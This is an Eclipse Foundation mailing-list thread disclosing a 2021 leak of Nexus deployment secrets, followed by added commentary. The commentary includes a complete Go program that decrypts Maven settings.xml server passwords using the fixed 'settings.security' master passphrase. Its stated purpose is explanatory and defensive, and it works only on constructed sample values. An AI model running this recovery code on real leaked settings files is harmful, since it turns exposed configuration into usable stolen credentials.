Re: [cbi-dev] credentials leak


We've posted a postmortem about the incident atël-barbero/credentials-leaked-github


Mikaël Barbero 
Manager — Release Engineering and Technology | Eclipse Foundation
🐦 @mikbarbero
Eclipse Foundation: The Platform for Open Innovation and Collaboration

On 19 Feb 2021, at 19:50, Denis Roy <denis.roy@xxxxxxxxxxxxxxxxxxxxxx> wrote:


On Feb 16th 2021, we received a security report about secrets in the main Jiro repository. This report was correct. On March 18th 2020, the secrets were committed inside the repository.

The secrets were deployment credentials for the Nexus application running on While the credentials themselves were encrypted, the master password was also part of the leak. While this master password was not in clear text, it is fairly easy to decode it and then use it to decrypt the credentials.
We managed to validate - to the best of our knowledge - that no release artifacts were tainted because of this leak. Unfortunately, we can’t do much for the snapshot artifacts. We know that about 13k of them are signed jars, but for the rest, it’s impossible to deny or confirm anything.

As far as your release bits are concerned, you are safe and do not have to do anything. Regarding your snapshots, we’ve been pruning unused snapshots (for more than 60 days) from the repositories. We suggest you start building new snapshot versions of all used artifacts. Feel free to reach out to webmasters if you want to have a list of those.
We'll be publishing a full postmortem for this event in the days to come.

Denis Roy
Director, IT Services | Eclipse Foundation
Eclipse Foundation: The Community for Open Innovation and Collaboration
Twitter: @droy_eclipse
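The message above describes the weak spot without naming the tool: encrypted credentials stored next to an obfuscated master password. That is exactly the shape of Maven's settings.xml plus settings-security.xml, where server passwords are encrypted under a master password and the master password itself is encrypted under the fixed passphrase "settings.security", so anyone holding both files can recover everything. The block below is an added illustration of that recovery path, written for this page; it is not code from the Jiro project or from the Eclipse Foundation, and it assumes (not stated in the thread) that the leaked files used the Maven/Plexus Cipher layout (8-byte salt, a filler-length byte, AES-128-CBC with PKCS#5 padding, key and IV taken from SHA-256(passphrase || salt)). All values are constructed by the block itself.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"strings"
)

const (
	saltSize  = 8
	chunkSize = 16
	// Fixed passphrase Maven's sec-dispatcher uses for the master password in
	// settings-security.xml. It is a constant, not a secret, which is why the
	// "encrypted" master password is only obfuscated.
	masterPassphrase = "settings.security"
)

// keyAndIV derives a 16-byte AES key and 16-byte IV from SHA-256(passphrase || salt).
func keyAndIV(pass string, salt []byte) (key, iv []byte) {
	h := sha256.New()
	h.Write([]byte(pass))
	h.Write(salt)
	sum := h.Sum(nil)
	return sum[:16], sum[16:32]
}

// encryptDecorated builds "{base64}" in the Plexus layout: salt | fillerLen | AES-CBC body | random filler.
func encryptDecorated(clear, pass string) (string, error) {
	salt := make([]byte, saltSize)
	if _, err := rand.Read(salt); err != nil {
		return "", err
	}
	key, iv := keyAndIV(pass, salt)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pad := chunkSize - len(clear)%chunkSize // PKCS#5 padding
	plain := append([]byte(clear), bytes.Repeat([]byte{byte(pad)}, pad)...)
	body := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(body, plain)
	filler := byte(chunkSize - (saltSize+len(body)+1)%chunkSize)
	junk := make([]byte, filler)
	if _, err := rand.Read(junk); err != nil {
		return "", err
	}
	out := append(append(append(append([]byte{}, salt...), filler), body...), junk...)
	return "{" + base64.StdEncoding.EncodeToString(out) + "}", nil
}

// decryptDecorated reverses encryptDecorated; it also accepts an undecorated base64 string.
func decryptDecorated(enc, pass string) (string, error) {
	enc = strings.TrimSuffix(strings.TrimPrefix(strings.TrimSpace(enc), "{"), "}")
	raw, err := base64.StdEncoding.DecodeString(enc)
	if err != nil {
		return "", err
	}
	if len(raw) < saltSize+1+chunkSize {
		return "", fmt.Errorf("blob too short")
	}
	salt := raw[:saltSize]
	bodyEnd := len(raw) - int(raw[saltSize])
	bodyLen := bodyEnd - saltSize - 1
	if bodyLen < chunkSize || bodyLen%chunkSize != 0 {
		return "", fmt.Errorf("bad body length")
	}
	body := raw[saltSize+1 : bodyEnd]
	key, iv := keyAndIV(pass, salt)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	plain := make([]byte, len(body))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, body)
	pad := int(plain[len(plain)-1])
	if pad < 1 || pad > chunkSize {
		return "", fmt.Errorf("bad padding")
	}
	return string(plain[:len(plain)-pad]), nil
}

// recoverServerPassword is what a holder of both leaked files does: unlock the master
// password with the fixed passphrase, then unlock the server credential with the result.
func recoverServerPassword(encMaster, encServer string) (string, error) {
	master, err := decryptDecorated(encMaster, masterPassphrase)
	if err != nil {
		return "", err
	}
	return decryptDecorated(encServer, master)
}

func main() {
	// Constructed sample values (hypothetical, not from any real settings file).
	encMaster, _ := encryptDecorated("hypothetical-master-secret", masterPassphrase)
	encServer, _ := encryptDecorated("hypothetical-nexus-deploy-pw", "hypothetical-master-secret")
	fmt.Println("settings-security.xml master:", encMaster)
	fmt.Println("settings.xml server password:", encServer)
	pw, err := recoverServerPassword(encMaster, encServer)
	fmt.Println("recovered:", pw, err)
}
```

The practical consequence for a repository like the one in the report is that committing settings-security.xml alongside settings.xml is equivalent to committing the plaintext credentials; rotating the Nexus deployment password, not just removing the files from history, is the fix.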